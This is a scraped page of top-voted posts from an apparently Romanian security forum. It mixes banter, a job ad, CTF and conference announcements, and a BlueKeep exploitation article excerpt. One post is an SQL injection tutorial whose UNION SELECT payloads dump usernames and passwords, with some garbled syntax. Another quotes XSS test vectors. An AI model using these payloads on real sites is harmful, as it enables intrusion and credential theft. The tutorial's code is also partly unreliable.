Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 09/11/19 in all areas

  1. 3 points
    Gata frate, i-ati dat cu gugalu in cap, asta a fost ultima lui postare, imi aminteste de vremurile bune ale forumului, nostalgia asta. Cheats for samp si puterea dragostei nu sunt compatibile cu profilul unui meserias priceput in vulnerabilitati web din punctul meu de vedere, cred ca putem fi de acord cu aceasta afirmatie. Trebuie lucrat la mentalitate si apoi la cunostiinte, ce rost are sa folosesti niste vectori si nici sa nu stii ce fac, sau cum poti exploata vulnerabilitatea mai departe, nu te ajuta la nimic, nu demonstrezi nimic, si eu pot sa scriu alea intr-un input si habar nu am ce sa fac mai departe, nu poti fi eligibil pentru un bug bounty pentru ca nu o sa stii sa il repari sau sa demonstrezi ce poti face cu el.
  2. 2 points
  3. 2 points
    Bine ai venit...rau ai nimerit
  4. 2 points
  5. 2 points
    Salut, in acest tutorial o sa arat cum putem face un ChatRoom (Cu tot cu host). Pasul 1 - Ne facem cont pe Repl.It (Ne putem loga si cu gmail). Eu am un cont facut special pentru tutoriale pe acest forum. Link: https://repl.it/ Pasul 2 - Facem un repl de Nodejs si il numim "server" (sau ce nume vrem). Pasul 3 - Pe langa index.js facem 2 fisiere numite: package-lock.json; package.json. Pasul 4 - In index.js copypaste la urmatorul cod: https://pastebin.com/pfNEcACv Pasul 5 - In package-lock.json copypaste la urmatorul cod: https://pastebin.com/2dRvEwvt Pasul 6 - In package.json copypaste la urmatorul cod: https://pastebin.com/Fjg073BQ Pasul 7 - Dam run la repl-u' nostru, asteptam sa instaleze tot ce e de instalat si dupa ce termina copiam linku' de la repl-u' nostru (o sa avem nevoie de el mai tarziu): Pasul 8 - Mai facem un repl de nodejs si il numim "ChatRoom" (sau ce nume vrem). Pasul 9 - Pe langa index.js facem 2 fisiere numite: package-lock.json; package.json. Pasul 10 - In index.js copypaste la urmatorul cod: https://pastebin.com/a5j9MPNa Pe linia de cod 4 unde scrie: var socket = io("Link"); in loc de "link" punem link-u' de la repl-u' ce-l facusem inainte. (Repl-u' cu numele server sau ce nume a-ti pus). Pasul 11 - In package-lock.json copypaste la urmatorul cod: https://pastebin.com/sABUuGCB Pasul 12 - In package.json copypaste la urmatorul cod: https://pastebin.com/xtgv9pMr GATA DAM RUN SI DESCHIDEM LINK-U DE LA REPL-U' "CHATROOM" SAU CUM L-ATI NUMIT. SI IL DAM PERSOANEI CU CARE VREM SA COMUNICAM PE ACEL CHATROOM LINK DE LA CHATROOM-UL CE L-AM FACUT PENTRU ACEST TUTORIAL: https://chatroom.tutorialerepl.repl.run/
  6. 2 points
    Am inteles. Eram doar curios cum am spus. Spune-mi totusi, daca ai fi intrebat sa explici cum poate fi reparata respectiva vulnerabilitate cum ai raspunde daca tu nu intelegi ce o genereaza in primul rand? Si mai rau, nici nu pare ca doresti sa vrei sa-ntelegi. "Ce conteaza ce cod am folosit". Cum adica nu conteaza? Conteaza, conteaza foarte mult. iti zic eu ca primul vector enuntat mai sus, nu o sa functioneze cum ti-ai dorit, pentru ca functia Alert() ia un singur parametru. Ar functiona doar un contextul in care ai variabila source definita pe undeva, dar nu ar afisa-o, in caz contrar ti-ar da un refference error frumos. Ce ai facut tu acolo este foarte foarte messy, conteaza mult si cat de eleganta este solutia ta. Eu nu incercam sa te descurajez, ci doar sa te-ndemn sa-ntelegi mai bine ce se-ntampla, pentru ca iti usurezi viata. Cheers!
  7. 2 points
    Am fost odată să mă întâlesc cu un client potențial, ceva patron de „firmă de construcții”, pentru site și promovare online. Zice omul, hai la mine la birou, într-un cartier de la marginea orașului. Zic ok. Îl iau pe colegul de la firmă și hai să mergem acolo, să vedem despre ce e vorba. Ajungem la adresă, era doar un șantier..mă rog, șantier e mult spus, era o bucată de pământ cu niște materiale pe ea. Nimeni în jur. Îi fac lu colegu, hai să îl sunăm pe ăla, dar chiar atunci the big boss apare. Big pentru că era ditamai balabusta, 200kg pe metru pătrat. Cu o mașină, desigur, de patron. Dacia Solenza care cred că pe drum a mai lăsat 3 bucăți de tablă ruginită amintire pe undeva. Prima impresie era clară. Întrebăm de birou, că venisem cu laptopul, să îi arătăm x, y, face omul că „aa, nu, că eu n-am birou. aici aveam treabă și de aia v-am chemat”. Ok.... - Păi și cum facem, discutăm aici, pe stradă? - Da, hai, ziceți care e treaba. - Uite domle, așa, așa, vă facem un site, începem SEO pe el, între timp facem reclame plătite pe Google și Facebook, etc. - Bun..și bani? Că eu am mai discutat cu niște firme din oraș dar mi-au cerut mult, tare mult. Prea mulți bani. Pentru un site...nu se poate așa ceva... Mă uit la colegul și deja nu mirosea a bine, ne-am pierdut timpul degeaba, în gândul meu. ...hai, ziceți cât vreți. - Păi..na..dacă tot ați zis că v-au cerut mult ceilalți, spuneți-ne cât v-au cerut și vedem, ajungem până la urmă la o concluzie. - Unul mi-a cerut 400 lei și altul 300 pe site. Mult, prea mult. Mulți bani. Nu se poate așa ceva. Ne-am cărat de acolo și râdeam în mașină de situație. Care firmă de construcții, ăla dacă lua o lucrare la un coteț rămânea fără muncitori. Cam așa e și cu voi, ăștia, de nu știți ce vreți dar știți cât costă .
  8. 2 points
    IMEI NUMBER: *#06# SMS INFO: *#9998*746# TEST MODE:*#0*# SOFTWARE INFORMATION: *#1234# DIAGNOSTIC: *#*#4636#*#* HELP MENU: *#9998*4357# JAVA MENU: *#9998*5282# MEMORY STATUS: *#9998*636# FACTORY RESET: *#*#7780#*#* GPS TEST: *#*#1472365#*#* BATERY CODE: *#0228# AUDIO TEST: *#0673# SERVICE MENU: *#0011# VIEW PHONE LOOK STATUS: *#7465625#
  9. 2 points
    Aveti optiunea de a descarca documentul daca incarcati un altul. Un fel de barter, voi urcati un PDF aleatoriu si in schimb primiti documentul care va intereseaza.
  10. 2 points
    How to Exploit BlueKeep Vulnerability with Metasploit Sep 10, 2019 • Razvan Ionescu, Stefan Bratescu, Cristin Sirbu In this article we show our approach for exploiting the RDP BlueKeep vulnerability using the recently proposed Metasploit module. We show how to obtain a Meterpreter shell on a vulnerable Windows 2008 R2 machine by adjusting the Metasploit module code (GROOMBASE and GROOMSIZE values) because the exploit does not currently work out-of-the-box. Further on, we explain the steps we took to make the module work properly on our target machine: Background Prerequisites Installing the Bluekeep exploit module in Metasploit Preparing the target machine Adjusting the BlueKeep exploit Running the exploit module Conclusions 1. Background BlueKeep is a critical Remote Code Execution vulnerability in Microsoft’s RDP service. Since the vulnerability is wormable, it has caught a great deal of attention from the security community, being in the same category with EternalBlue MS17-010 and Conficker MS08-067. You can read an in-depth analysis of the BlueKeep vulnerability on our blog post. A few days ago, a Metasploit contributor - zerosum0x0 - has submitted a pull request to the framework containing an exploit module for BlueKeep(CVE-2019-0708). The Rapid7 team has also published an article about this exploit on their blog. As of now, the module is not yet integrated into the main Metasploit branch (it’s still a pull request) and it only targets Windows 2008 R2 and Windows 7 SP1, 64-bit versions. Furthermore, the module is now ranked as Manual since the user needs to provide additional information about the target, otherwise it risks of crashing it with BSOD Articol complet: https://pentest-tools.com/blog/bluekeep-exploit-metasploit/
  11. 2 points
    De preferat da, pana va regasiti
  12. 1 point
    Bitdefender is proud to announce PwnThyBytes Capture The Flag – our competitive ethical hacking contest September 17, 2019 2 Min Read We hope you’ve all enjoyed your summer holidays, chilling out on the beach, seeing new places and recharging your batteries. Because this autumn we’ve prepared the first edition of PwnThyBytes CTF, a top-notch global computer security competition, which we hope will be a fun and challenging experience for everybody. The contest starts on September 28th and we’re hyped to give you a sneak peek at what to expect. Information security competitions, such as capture the flag (CTF) contests, have surged in popularity during the past decade. Think of them almost like e-sports for ethical hacking. In line with our mission to safeguard users’ data, we at Bitdefender host this event to bring together some of the most skilled teams around the world in areas such as Reverse Engineering, Binary Exploitation, Web Application Auditing, Computer Forensics Investigation, and Cryptography. We extend a warm invitation to everyone connected to or interested in computer security. Build up a team of friends or seasoned professionals, or even have at it by yourself if that’s your thing. Pit yourselves against the most seasoned security professionals on the CTF scene. Enjoy the experience of displaying your techniques, learning new skills, competing with kindred spirits, all for the chance of claiming the rewards and the glory that comes with them. Do you like delving deep into programs, websites, and anything related to computers? Do you like challenging yourself for the pleasure of improvement? Do you want to see just how good you are compared to the rest? If any of these questions strikes a nerve, click here to register. We look forward to seeing you showcase your skills! What do I need to know? Some skills/knowledge you’ll need throughout the competition: Systems programming and OS internals (Linux, Windows), executable formats knowledge (ELF, PE) Reverse Engineering: anti-reverse techniques, anti-debugging techniques, packers, obfuscation, kernel modules Architectures: X86, X86_64, ARM, Web Assembly Vulnerability analysis and exploitation of binaries Web Application Auditing Computer forensics Investigation: memory forensics, software defined radio, file system forensics Cryptography: symmetric, asymmetric, post-quantum schemes and general math skills Graph algorithms What are the prizes? 1st place: 2,048 € 2nd place: 1,024 € 3rd place: 512 € Sursa: https://labs.bitdefender.com/2019/09/bitdefender-is-proud-to-announce-pwnthybytes-capture-the-flag-our-competitive-ethical-hacking-contest/
  13. 1 point
    Tu crezi ca exista hosteri normali la cap care sa iti vanda tie cu 1$ un vps cu care sa faci 2$ din minat ?:)
  14. 1 point
  15. 1 point
    Yes noob, please provide a step by step tutorial for PRO haxors!!!
  16. 1 point
    Ai explicat fain,Felicitari si bine ai venit.Incearca sa postezi ceva continut mai ok si nineni nu o sa mai zica nimic.BAFTA!
  17. 1 point
    Daca vrei sa impartasesti cod, poti folosi github care e folosit de toata lumea. Nu mai e nevoie sa faci un tutorial la fiecare proiect si nu e nevoie nici sa-ti tii codul aruncat pe site-uri gen pastebin. Iti dau tutorial introductiv in git & github daca vrei.
  18. 1 point
    Daca vroiai sa le inchizi gura, explicai intr-o maniera profi ce te-a intrebat mai sus c3m3d3, sa fi venit si cu rezolvarea "vulnerabilitatii" respective, nu sa te iei in gura cu ei, ca o baba-n coltu' blocului. Cu aroganta nu faci nimic fara un background solid in spate, acum te vor lua toti la poola.
  19. 1 point
    Din ce vad acolo ai luat la rand toti vectorii posibili fara sa ai idee ce-nseamna fiecare, nu-ncerc sa fiu critic, pentru ca poate esti baiat destept. Am si eu niste curiozitati totusi, pentru ca eu sunt mai prostut. Din ce vad ai folosit urmatoarele doua treburi pe acolo: 1. <body onload=alert(/xss/,source)> 2. alert(String.fromCharCode(88,83,83)) Care-i treaba cu al 2-lea argument dat la primul alert(), ce ar trebui sa faca? Also, daca sunt cazuri in care passezi la Alert un String direct si iti merge, de ce mai folosesti si String.fromCharCode()? O fi oare pentru ca ai copiat tot ce-ai prins, sau esti mai destept decat pari?
  20. 1 point
  21. 1 point
    Nu te ajutā nimeni + mentenanţă
  22. 1 point
  23. 1 point
    Tu te intreci cu OKQL? >download scribd o carte >da link de scribd Creca vrea invitatie pe filelist https://www84.zippyshare.com/v/jOTSdyzx/file.html @lauryca
  24. 1 point
    Nu mai bine schimbi fontul acela de "kkt" si postezi în categoria potrivită? Ce buget dispui?
  25. 1 point
    Salariu :2500 euro Job Title : Firewall Engineer Location : Bucharest, Romania Job Position : 12 Contract FTE Start Date : Immediate Job Description : Your Responsibility as Firewall engineer As a subject matter expert you will: • Execute tasks assigned, autonomously • Be a team member in the squads • Be pro-active, quality driven • Solve incidents • Prepare and implementing changes • Automate (in Ansible and ServiceNow) a number of tasks (example: A request to create Jira project in service-now will create a project in JIRA) with Ansible • Update documentation/procedures Your Experience • Worked on tasks related to changes, automation and any other tasks decided by the business analysts / product owner • Understand Firewall rules, data traffic, routing • Supported various migrations/updates and upgrade activities in Networks • Understand the VMware concept and monitoring • Solved operational tickets w.r.t. Network traffic, Firewall rules end-2-end connectivity • Worked with Ansible • Worked in DevOps, Scrum, Agile • Understand ITIL • Worked with VMware, Linux, Windows environment • Implement best practice • Understand Security. Understand authentication, authorization • Understand, created and implemented Network designs • Knowledge of security scans and (cyber threat) risk assessments • Knowledge of IDS/IPS, WAF and content scanning Your profile: • Academic degree (preferably Technology) • Expert knowledge and understanding of CISCO network architecture and PALO ALTO • Expert knowledge in understanding network traffic, end-2-end connectivity and rules involved • Expert knowledge of network connectivity, concepts, devices, roles. • Expert knowledge on DHCP/Proxy/PEP/EOD/IPNS/DNS, load balancing • Expert knowledge of Network protocols like TCP/IP, HTTP/S, FTP, VPN technology, SSL, routing and switching. • Knowledge on LDAP/eDir • Strong scripting knowledge - Ansible (GIT). • Analytical and good problem-solving skills • Possess a positive and proactive ('can do') attitude • Customer focused and service minded • Work independently while remaining a team player • Presentation skills and ability to work in a global team and communicate effectively with cross-functional team members and customers • Zabbix knowledge (monitoring tool)
  26. 1 point
    Sa zicem ca aveti un site din programul "Big Bounty" si vreti sa incercati un atac MYSQL. Eu am sa pun urmatorul site fictional: https://victimescu.com/index.php?id=5 Pentru a verifica daca site-ul nostru da o eroare Sql trebuie sa punem dupa parametrul .php?.id=5 semnul ('). Daca acesta este vulnerabil va scrie urmatoarea chestie: You have an error in your SQL syntax; check the manual that corresponds to your….. Continued Daca acesta nu este vulnerabil, site-ul nostru va functiona normal. In continuare trebuie sa mergem cu parametrul (ORDER BY ) ca in pasul de mai sus. - Acesta este folosit pentru a verifica cate coloane se afla pe pagina respectiva in baza de date mySQL. https://victimescu.com/index.php?id=5 ORDER BY 5 - Daca pagina noastra functioneaza perfect normal inseamna ca sunt prezente mai mult de 5 coloane in baza de date. Incercam sa marim numarul cu 10. https://victimescu.com/index.php?id=1 ORDER BY 15- Sa zicem ca acum ne va aparea eroarea care ne indica numarul de coloane prezente. Unknown column ’10’ in ‘order clause’Unknown column ’10’ in ‘order clause’ Sa zicem ca pe site-ul nostru fictional avem prezente 9 coloane. Acum continuam doar cu parametrul (UNION SELECT). https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9 In continuare trebuie sa apara 2 numere care indica unde facem injectarea. ------------------------------------------------- Un numar din cele 2 va fi boldit. ------------------------------------------------- Sa zicem ca cele 2 numere sunt 5 si 3 iar cel care ne indica baza de date sau coloana unde trebuie facuta injectarea este 5. https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (table_name),6,7 from information_schema.tables Aceasta comanda ne ajuta sa vedem ce se afla in aceasta baza de date. CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS In continuare pentru a extrage mai multe chestii scriem urmatoarea comanda: https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (column_name),6,7 from information_schema.columns where table_schema=database()- in continuare o sa ne apara: -useri -parole -email-uri -etc https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact(username,0x3a,password),67 from database- Aceasta comanda a fost folosita pentru a afla parola de la panel. ------------------------------------------------- Deseori parola va fi in format MD5 ------------------------------------------------- Acesta a fost tutorialul si sper sa fie folosit in scopuri bune.
  27. 1 point
    O fi defectă memoria de bios sau nu e compatibilă cu interfața sau are alte tensiuni de alimentare...? Dacă ai luat stația de lipit inlocuiește-i cipu' de bios și vezi ce zice.
  28. 1 point
    Salutare all, In curand lansam acesta conferinta in Bucuresti, 17-18 Octombrie. HTZ pune accent foarte mare pe Ethical Hacking, iar dupa cum stim din ce in ce mai des apar incidente majore in industrie (data breaches or damage). Noi ne deosebim fata de alte conferinte prin challenge-urile de pen-testing, facute in totalitate de staff-ul nostru. Prin aceste challenge-uri va punem la incercare creativitatea si totodata skill-urile voastre de: pen-testing, scripting, social engineering, crypto si multe altele. Scopul nostru este va aruncam in mijlocul actiunii, sa ne indepartam putin de platformele online, sa interactionam mai mult face to face, sa ne cunoastem si altfel ... nu doar dupa NickName :). Challenge-urile incep in data de 11-12 Octombrie si o sa fie nevoie de deplasare prin Bucuresti, in diferite Geo Locations pentru a finaliza challenge-urile. Fiecare challenge te va ghida catre alt challenge! Evident, exista niste reguli pentru aceste challenge-uri, aceste reguli se regasesc pe website-ul nostru https://www.hackthezone.com/tickets/rules-and-tactics . La finalul acestor challenge-uri, ne vedem cu totii la conferinta din data de 17-18 Octombrie, in Crystal Palace Ballrooms, Calea Rahovei 198A, Sector 5. Da, o sa fim si noi pe scena sa va prezentam fiecare challenge cum trebuia rezolvat (walkthrough scenarios) si decernarea premiului. Premiul este luat de o singura persoana, the best of the best! Poti sa participi si cu echipa. Nu este nici o problema, dar tot cel mai bun timp facut de o persoana o sa fie premiat :D la final ... va impartiti voi premiul. La conferinta o sa avem mai speakers de top ce vor ilustra diferinte puncte de vedere despre IT Security, cum evolueaza atacatorii, cum am putea sa ne aparam mai bine si nu numai. Biletele pot fi achizitionate de aici : https://www.iabilet.ro/bilete-hackthezone-conference-challenges-43985 Website-ul nostru o sa fie in permanentat actualizat, iar mici detalii pot fie modificate sau imbunatatite. Pentru intrebari sau nelamuriri, puteti sa ne gasiti si pe canalul nostru de Slack la : https://www.hackthezone.com/slack . Have fun! AlexHTZ
  29. 1 point
  30. 1 point
  31. 0 points
    Esti un terminat daca dupa ce ti-am dat downvote ai inceput sa creezi conturi sa imi dai downvote. Fa ceva cu viata ta
  32. 0 points
    Aha, si package-lock.json ce face? Puneti ba mana si invatati ce fac tool-urile pe care le folositi. Voi chiar puteti sa fiti multumiti de voi in halul asta?
  33. -1 points
    Nu mai bine iti vezi tu de viata si te opresti in a-ti share-ui ideile ?
  34. -1 points
    Codurile sunt ok pe terminale cu soft de fabrică. La ăștia cu AOSP, nu prea merg...
  35. -1 points
    Dar mai pe scurt package.json ofera o varianta ez de a "urmări" pachetele care sunt utilizate în aplicație/program. " { "main": "index.js", "dependencies": { "socket.io-client": "2.1.1", "chalk": "2.4.1", "prompts": "1.2.0" } } " wow
  36. -2 points
    de ce a traversat gaina strada ?
  37. -2 points
  38. -2 points
    Download GTA 5 APK Mobile game on TutuApp now. It is already on Tutuapp 2019. Everyone, install it now.
  39. -2 points
    Hello, the MSM8974 is also known as the Qualcomm Snapdragon 800, pretty old SoC, but I made a tutorial for the exploit a while back, check it out: http://bit.do/e8GFr
  40. -3 points
    Ce ai fumat acolo?
  41. -3 points
    list3[2][2] = 'goodbye'
  42. -3 points
    i l-am facut si eu azi noapte. A disparut subit cu codul
  43. -3 points
  44. -3 points
  45. -3 points
  46. -3 points
    De ce nu stergeti si voi threadurile astea sa nu mai vina lumea sa cerseasca?
  47. -3 points
    Hacker adevarat
×
×
  • Create New...